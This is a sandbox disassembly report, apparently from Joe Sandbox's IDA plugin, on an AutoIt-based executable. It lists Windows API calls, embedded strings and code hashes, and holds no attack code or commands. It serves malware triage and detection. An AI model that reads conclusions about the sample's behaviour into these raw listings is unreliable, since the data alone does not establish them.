                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearInit$_memset
                                                                                                                                        • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                                                                                        • API String ID: 2862541840-625585964
                                                                                                                                        • Opcode ID: 76aa3638224beef5ec2a52687b1cb98ebf1e855f1d9a9de31f9baec9038d9678
                                                                                                                                        • Instruction ID: 7b675fccc5ad7aea651ed1485b361c3eede93a2246b4b9cfa925165bf7e5ef54
                                                                                                                                        • Opcode Fuzzy Hash: 76aa3638224beef5ec2a52687b1cb98ebf1e855f1d9a9de31f9baec9038d9678
                                                                                                                                        • Instruction Fuzzy Hash: 4C916DB1A00219EBDB25DFA4CC88FEEB7B8EF45710F10C159E515AB281D7789945CBA0
APIs
  • Part of subcall function 00763F9B: LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,007634E2,?,00000001), ref: 00763FCD
• _free.LIBCMT ref: 007D3C27
• _free.LIBCMT ref: 007D3C6E
  • Part of subcall function 0076BDF0: GetCurrentDirectoryW.KERNEL32(00000104,?,?,00002000,?,008222E8,?,00000000,?,00763E2E,?,00000000,?,007FDBF0,00000000,?), ref: 0076BE8B
  • Part of subcall function 0076BDF0: GetFullPathNameW.KERNEL32(?,00000104,?,?,?,00763E2E,?,00000000,?,007FDBF0,00000000,?,00000002), ref: 0076BEA7
  • Part of subcall function 0076BDF0: __wsplitpath.LIBCMT ref: 0076BF19
  • Part of subcall function 0076BDF0: _wcscpy.LIBCMT ref: 0076BF31
  • Part of subcall function 0076BDF0: _wcscat.LIBCMT ref: 0076BF46
  • Part of subcall function 0076BDF0: SetCurrentDirectoryW.KERNEL32(?), ref: 0076BF56
Strings
Memory Dump Source
• Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
Similarity
• API ID: CurrentDirectory_free$FullLibraryLoadNamePath__wsplitpath_wcscat_wcscpy
• String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error$E<v$G-v
• API String ID: 1510338132-2904561404
• Opcode ID: 0a000699d63dcdce96225ffaf667d8fd7779fdeec84065ea60cb46c5903061aa
• Instruction ID: 992e037b7e4b17c9aea9486a8a64b50cc386850769f5c338a04647a7f3ec06af
• Opcode Fuzzy Hash: 0a000699d63dcdce96225ffaf667d8fd7779fdeec84065ea60cb46c5903061aa
• Instruction Fuzzy Hash: 4E918F71A00219EFCF04EFA4CC559EEB7B4BF49310F04452AF816AB291DB38AE05CB61
APIs
• RegOpenKeyExW.KERNEL32(80000001,Software\AutoIt v3\AutoIt,00000000,00000001,?,00000000,?,0077EADA,?,?), ref: 0077EB27
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,00000000,?,?,0077EADA,?,?), ref: 007D4B26
• RegQueryValueExW.ADVAPI32(?,Include,00000000,00000000,?,?,00000000,?,?,0077EADA,?,?), ref: 007D4B65
• RegCloseKey.ADVAPI32(?,?,0077EADA,?,?), ref: 007D4B94
Strings
Memory Dump Source
• Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
Similarity
• API ID: QueryValue$CloseOpen
• String ID: Include$Software\AutoIt v3\AutoIt
• API String ID: 1586453840-614718249
• Opcode ID: 2a38920107648fb217d18eb8d60e1bce8650eb6f13951ba700bc13631111fe8b
• Instruction ID: 8651891cfc88af204f2db2344ac4729dc5f2594b560f2ea273181f6e942a8e38
• Opcode Fuzzy Hash: 2a38920107648fb217d18eb8d60e1bce8650eb6f13951ba700bc13631111fe8b
• Instruction Fuzzy Hash: 1A113DB1605108BFEB14DBA4CD8AEFE77BCEB04354F104059B506E6191EA799E05DB60
APIs
• CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000), ref: 00762ECB
• CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00762EEC
• ShowWindow.USER32(00000000), ref: 00762F00
• ShowWindow.USER32(00000000), ref: 00762F09
Strings
Memory Dump Source
• Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
Similarity
• API ID: Window$CreateShow
• String ID: AutoIt v3$edit
• API String ID: 1584632944-3779509399
• Opcode ID: 4591e77c4a12b9419b291c951ff919a712ca0a13748021b294c8ad67d92985b5
• Instruction ID: 88201282543ac634c0e02d2dc132e019451333c10deba2616799800b7cca4b8a
• Opcode Fuzzy Hash: 4591e77c4a12b9419b291c951ff919a712ca0a13748021b294c8ad67d92985b5
• Instruction Fuzzy Hash: 9FF030706406D47ADB3057576C4CE773E7EE7D6F10F11802EBA0496160C1650C92CAB4
APIs
  • Part of subcall function 00763B1E: _wcsncpy.LIBCMT ref: 00763B32
• GetFileAttributesW.KERNEL32(?,?,00000000), ref: 007A6DBA
• GetLastError.KERNEL32 ref: 007A6DC5
• CreateDirectoryW.KERNEL32(?,00000000), ref: 007A6DD9
• _wcsrchr.LIBCMT ref: 007A6DFB
  • Part of subcall function 007A6D6D: CreateDirectoryW.KERNEL32(?,00000000), ref: 007A6E31
Memory Dump Source
• Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
Similarity
• API ID: CreateDirectory$AttributesErrorFileLast_wcsncpy_wcsrchr
• String ID:
• API String ID: 3633006590-0
• Opcode ID: 2bd494a98aac21e102a9b50a8c064e73be010a7c5a3e1bf0107aa3e8a1ea7450
• Instruction ID: 0e34d3f14d9a88c1f05f886ffb0480a26b9cb4fd4548c50708020d85da88097f
• Opcode Fuzzy Hash: 2bd494a98aac21e102a9b50a8c064e73be010a7c5a3e1bf0107aa3e8a1ea7450
• Instruction Fuzzy Hash: 03210265B45318DADF247774EC8EAEA33ACEF43760F280355E425C70D2EB29CE848A54
APIs
  • Part of subcall function 007BACD3: inet_addr.WS2_32(00000000), ref: 007BACF5
• socket.WS2_32(00000002,00000001,00000006,?,?,00000000), ref: 007B9160
• WSAGetLastError.WS2_32(00000000), ref: 007B916F
• connect.WS2_32(00000000,?,00000010), ref: 007B918B
Memory Dump Source
• Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
• Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
• Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
Similarity
• API ID: ErrorLastconnectinet_addrsocket
• String ID:
• API String ID: 3701255441-0
• Opcode ID: d4632ee78b422a7e1fac11116a8c2c99b9825cae00e9c2ec7477618e3baa548e
• Instruction ID: 45f13026b4ea7744c30b87f99a84cd3604f632147c895de93aa9689b48a3e4fb
• Opcode Fuzzy Hash: d4632ee78b422a7e1fac11116a8c2c99b9825cae00e9c2ec7477618e3baa548e
• Instruction Fuzzy Hash: 4D21D5312002149FCB10AF28CC89BAE77A9EF89320F048159FA16EB3D2CB78EC018751
                                                                                                                                        APIs
                                                                                                                                        • SHGetMalloc.SHELL32(1<v), ref: 00763A7D
                                                                                                                                        • SHGetPathFromIDListW.SHELL32(?,?), ref: 00763AD2
                                                                                                                                        • SHGetDesktopFolder.SHELL32(?), ref: 00763A8F
                                                                                                                                          • Part of subcall function 00763B1E: _wcsncpy.LIBCMT ref: 00763B32
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: DesktopFolderFromListMallocPath_wcsncpy
                                                                                                                                        • String ID: 1<v
                                                                                                                                        • API String ID: 3981382179-276691779
                                                                                                                                        APIs
                                                                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,0077C948,SwapMouseButtons,00000004,?), ref: 0077C979
                                                                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,0077C948,SwapMouseButtons,00000004,?,?,?,?,0077BF22), ref: 0077C99A
                                                                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,0077C948,SwapMouseButtons,00000004,?,?,?,?,0077BF22), ref: 0077C9BC
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseOpenQueryValue
                                                                                                                                        • String ID: Control Panel\Mouse
                                                                                                                                        • API String ID: 3677997916-824357125
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007616F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00761751
                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0076159B
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00761612
                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 007D58F7
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                        • String ID: '/z
                                                                                                                                        • API String ID: 458326420-1619994936
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007641A7: _fseek.LIBCMT ref: 007641BF
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF49
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF5C
                                                                                                                                        • _free.LIBCMT ref: 007ACDC9
                                                                                                                                        • _free.LIBCMT ref: 007ACDD0
                                                                                                                                        • _free.LIBCMT ref: 007ACE3B
                                                                                                                                          • Part of subcall function 007828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828DE
                                                                                                                                          • Part of subcall function 007828CA: GetLastError.KERNEL32(00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828F0
                                                                                                                                        • _free.LIBCMT ref: 007ACE43
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1552873950-0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00761E87
                                                                                                                                          • Part of subcall function 007638E4: _memset.LIBCMT ref: 00763965
                                                                                                                                          • Part of subcall function 007638E4: _wcscpy.LIBCMT ref: 007639B5
                                                                                                                                          • Part of subcall function 007638E4: Shell_NotifyIconW.SHELL32(00000001,?), ref: 007639C6
                                                                                                                                        • KillTimer.USER32(?,00000001), ref: 00761EDC
                                                                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00761EEB
                                                                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 007D4526
                                                                                                                                        Similarity
                                                                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1378193009-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,007AAEA5,?,?,00000000,00000008), ref: 0077F282
                                                                                                                                          • Part of subcall function 0077F26B: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,007AAEA5,?,?,00000000,00000008), ref: 0077F2A6
                                                                                                                                        • gethostbyname.WS2_32(?), ref: 007B92F0
                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 007B92FB
                                                                                                                                        • _memmove.LIBCMT ref: 007B9328
                                                                                                                                        • inet_ntoa.WS2_32(?), ref: 007B9333
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1504782959-0
                                                                                                                                        • Opcode ID: 5a7cbd0ecc0322c35e34389dfcef278dfa98568b31b0756d78c4ab39a42663d5
                                                                                                                                        • Instruction ID: 37c00c8243807361f9308eb3090ff23621202e4b94509dec8376dfef4bcfc709
                                                                                                                                        • Opcode Fuzzy Hash: 5a7cbd0ecc0322c35e34389dfcef278dfa98568b31b0756d78c4ab39a42663d5
                                                                                                                                        • Instruction Fuzzy Hash: ED116075500109EFCB14FBA4CD5ADEE77B9EF08310B108025FA06A72A2DB38EE14DB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007845EC: __FF_MSGBANNER.LIBCMT ref: 00784603
                                                                                                                                          • Part of subcall function 007845EC: __NMSG_WRITE.LIBCMT ref: 0078460A
                                                                                                                                          • Part of subcall function 007845EC: RtlAllocateHeap.NTDLL(01170000,00000000,00000001), ref: 0078462F
                                                                                                                                        • std::exception::exception.LIBCMT ref: 0078013E
                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00780153
                                                                                                                                          • Part of subcall function 00787495: RaiseException.KERNEL32(?,?,0076125D,00816598,?,?,?,00780158,0076125D,00816598,?,00000001), ref: 007874E6
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                                                                                        • String ID: bad allocation
                                                                                                                                        • API String ID: 3902256705-2104205924
                                                                                                                                        • Opcode ID: 2cd6d5793c9ecab29a2c43b60004351e0e7ef5733851dc6256f2ba62e9fa75a4
                                                                                                                                        • Instruction ID: e3926ab78d58d8b911cbb19710c4dbc2aca533e469d5793e5037bade48b835e2
                                                                                                                                        • Opcode Fuzzy Hash: 2cd6d5793c9ecab29a2c43b60004351e0e7ef5733851dc6256f2ba62e9fa75a4
                                                                                                                                        • Instruction Fuzzy Hash: 03F0F43558820EE6C725BAA8DC0E9DE77EDAF08360F104025F905D2181DBB8CE84D3E5
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID:
                                                                                                                                        • Opcode ID: 8436cc7e6a19b895e377732bb5bc669903379a47ff06e304c3fcb0b75d781b00
                                                                                                                                        • Instruction ID: 80291ab460bd4272fc932292e7f4afe36801e641517123b196d1a02e9f32f7b4
                                                                                                                                        • Opcode Fuzzy Hash: 8436cc7e6a19b895e377732bb5bc669903379a47ff06e304c3fcb0b75d781b00
                                                                                                                                        • Instruction Fuzzy Hash: A3F17C71604701DFC714DF28C884B9ABBE5FF89714F10892DF9999B292D738E945CB82
                                                                                                                                        APIs
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,00000000,?,?,?,0076C00E,?,?,?,?,00000010), ref: 0076C627
                                                                                                                                        • MultiByteToWideChar.KERNEL32(00000000,00000001,?,?,00000000,?,?,?,00000010), ref: 0076C65F
                                                                                                                                        • _memmove.LIBCMT ref: 0076C697
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3033907384-0
                                                                                                                                        • Opcode ID: 68e51fd34ce3f761111fde456a7cc82e2440c203941dac0691dd001e1f44ad39
                                                                                                                                        • Instruction ID: cbd3731e9a1c2b4f8a5d502b915f289ffd3e4b843a18e152eb637da62a22d277
                                                                                                                                        • Opcode Fuzzy Hash: 68e51fd34ce3f761111fde456a7cc82e2440c203941dac0691dd001e1f44ad39
                                                                                                                                        • Instruction Fuzzy Hash: F5310BB1641201AFD765AB34D84AB2BB7D9EF44310F14453AFC5BCB290EA36E8108791
                                                                                                                                        APIs
                                                                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00784603
                                                                                                                                          • Part of subcall function 00788E52: __NMSG_WRITE.LIBCMT ref: 00788E79
                                                                                                                                          • Part of subcall function 00788E52: __NMSG_WRITE.LIBCMT ref: 00788E83
                                                                                                                                        • __NMSG_WRITE.LIBCMT ref: 0078460A
                                                                                                                                          • Part of subcall function 00788EB2: GetModuleFileNameW.KERNEL32(00000000,00820312,00000104,?,00000001,00780127), ref: 00788F44
                                                                                                                                          • Part of subcall function 00788EB2: ___crtMessageBoxW.LIBCMT ref: 00788FF2
                                                                                                                                          • Part of subcall function 00781D65: ___crtCorExitProcess.LIBCMT ref: 00781D6B
                                                                                                                                          • Part of subcall function 00781D65: ExitProcess.KERNEL32 ref: 00781D74
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • RtlAllocateHeap.NTDLL(01170000,00000000,00000001), ref: 0078462F
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1372826849-0
                                                                                                                                        • Opcode ID: fedd44a003e4271826c9682fac96e7ce05675db0a0cd2f803ef5ac857890b025
                                                                                                                                        • Instruction ID: 69a3dc3a9254095c5ea2ece29d88e35e63cad40298279ce139a3bbfe6847f1e1
                                                                                                                                        • Opcode Fuzzy Hash: fedd44a003e4271826c9682fac96e7ce05675db0a0cd2f803ef5ac857890b025
                                                                                                                                        • Instruction Fuzzy Hash: 9C0192317C1312EBE6203B74AC46A2A2758AB82761F510126F505DB182EFFC9C418B66
                                                                                                                                        APIs
                                                                                                                                        • TranslateMessage.USER32(?), ref: 0076E646
                                                                                                                                        • DispatchMessageW.USER32(?), ref: 0076E651
                                                                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 0076E664
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$DispatchPeekTranslate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4217535847-0
                                                                                                                                        • Opcode ID: 0ac9ea0e2906b80f1cb9c07385537056d1fd520f5db469f675c798b0b4643fed
                                                                                                                                        • Instruction ID: 2934970b66c0586d127fd8f16b56a195ca54ffacf06f103bbec25da6aa9aae0b
                                                                                                                                        • Opcode Fuzzy Hash: 0ac9ea0e2906b80f1cb9c07385537056d1fd520f5db469f675c798b0b4643fed
                                                                                                                                        • Instruction Fuzzy Hash: 88F012756043459BDB20D6E0CD89B6BB7DDBB98780F148C3DFA46C6180E7B8D4048722
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 007AC45E
                                                                                                                                          • Part of subcall function 007828CA: RtlFreeHeap.NTDLL(00000000,00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828DE
                                                                                                                                          • Part of subcall function 007828CA: GetLastError.KERNEL32(00000000,?,00788715,00000000,007888A3,00784673,?), ref: 007828F0
                                                                                                                                        • _free.LIBCMT ref: 007AC46F
                                                                                                                                        • _free.LIBCMT ref: 007AC481
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        Similarity
                                                                                                                                        • API ID:
                                                                                                                                        • String ID: CALL
                                                                                                                                        • API String ID: 0-4196123274
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memmove
                                                                                                                                        • String ID: EA06
                                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscmp
                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                        • API String ID: 856254489-3771769585
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007D3CF1
                                                                                                                                          • Part of subcall function 007631B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 007631DA
                                                                                                                                          • Part of subcall function 00763A67: SHGetMalloc.SHELL32(1<v), ref: 00763A7D
                                                                                                                                          • Part of subcall function 00763A67: SHGetDesktopFolder.SHELL32(?), ref: 00763A8F
                                                                                                                                          • Part of subcall function 00763A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00763AD2
                                                                                                                                          • Part of subcall function 00763B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,008222E8,?), ref: 00763B65
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                        • String ID: X
                                                                                                                                        • API String ID: 2727075218-3081909835
                                                                                                                                        Strings
                                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 007D34AA
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                                        APIs
                                                                                                                                        • GetCursorPos.USER32(?), ref: 007B8074
                                                                                                                                        • GetForegroundWindow.USER32 ref: 007B807A
                                                                                                                                          • Part of subcall function 007B6B19: GetWindowRect.USER32(?,?), ref: 007B6B2C
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$CursorForegroundRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1066937146-0
                                                                                                                                        • Opcode ID: 17d2d050e1d7a1bca8c8e9cae375ff9e72306f42f612f4f94172d0702fda46a4
                                                                                                                                        • Instruction ID: d26fba538e86e63957cf83834dea0d71cc6a2ff4b8a21ec85e86890f4a848522
                                                                                                                                        • Opcode Fuzzy Hash: 17d2d050e1d7a1bca8c8e9cae375ff9e72306f42f612f4f94172d0702fda46a4
                                                                                                                                        • Instruction Fuzzy Hash: 28313C75A00208EFDF11EFA4CC85AEEB7B8FF08314F108469E956A7251DB38AE45CB51
                                                                                                                                        APIs
                                                                                                                                        • IsWindow.USER32(00000000), ref: 007DDB31
                                                                                                                                        • IsWindow.USER32(00000000), ref: 007DDB6B
                                                                                                                                          • Part of subcall function 00761F04: GetForegroundWindow.USER32 ref: 00761FBE
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$Foreground
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 62970417-0
                                                                                                                                        • Opcode ID: 1110db78c8eff1b90536d4298fdb06ea6211b2a9bf9254fd1ae8340d813604d4
                                                                                                                                        • Instruction ID: 6b1a71d3b323b02a5dbc5428497520b08f71fcf51e762f4e10b79368fdc460b1
                                                                                                                                        • Opcode Fuzzy Hash: 1110db78c8eff1b90536d4298fdb06ea6211b2a9bf9254fd1ae8340d813604d4
                                                                                                                                        • Instruction Fuzzy Hash: 5F21F0B2600246AEDB20AF74C898BFE77B9AF84384F04042AFD1B86141DB39ED018761
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0076193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00761952
                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0079E344
                                                                                                                                        • _strlen.LIBCMT ref: 0079E34F
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2777139624-0
                                                                                                                                        • Opcode ID: 7f5f357e079b3b75635225bef69b92367cc858965a56fed1b1dd263c75eb42a9
                                                                                                                                        • Instruction ID: fcdd3a3637ac3bfa7ca8a05e7709e166820a684c8c95fbbd8f823e28206dcd13
                                                                                                                                        • Opcode Fuzzy Hash: 7f5f357e079b3b75635225bef69b92367cc858965a56fed1b1dd263c75eb42a9
                                                                                                                                        • Instruction Fuzzy Hash: D211A031600205FBDF05FBA8EC8E9BE7BA89F45350B104439FA069B192DE6D9C4697A0
                                                                                                                                        APIs
                                                                                                                                        • 745AC8D0.UXTHEME ref: 007636E6
                                                                                                                                          • Part of subcall function 00782025: __lock.LIBCMT ref: 0078202B
                                                                                                                                          • Part of subcall function 007632DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 007632F6
                                                                                                                                          • Part of subcall function 007632DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0076330B
                                                                                                                                          • Part of subcall function 0076374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 0076376D
                                                                                                                                          • Part of subcall function 0076374E: IsDebuggerPresent.KERNEL32(?,?), ref: 0076377F
                                                                                                                                          • Part of subcall function 0076374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_222.exe,00000104,?,00821120,C:\Users\user\Desktop\._cache_222.exe,00821124,?,?), ref: 007637EE
                                                                                                                                          • Part of subcall function 0076374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00763860
                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00763726
                                                                                                                                        Similarity
                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3809921791-0
                                                                                                                                        • Opcode ID: a9e76804865f8f742d04c3c68cada2aef518740e70e32c195bf32686b7e67448
                                                                                                                                        • Instruction ID: 1f0b9fd98564e6c1aa4a1a90414b6ffdf42c56cb8905e1d54a11bea6468cb100
                                                                                                                                        • Opcode Fuzzy Hash: a9e76804865f8f742d04c3c68cada2aef518740e70e32c195bf32686b7e67448
                                                                                                                                        • Instruction Fuzzy Hash: 9A11AEB1908344DFC720EF25DC4990ABBE8FB94750F00851EF455872B2DB789A46CF92
                                                                                                                                        APIs
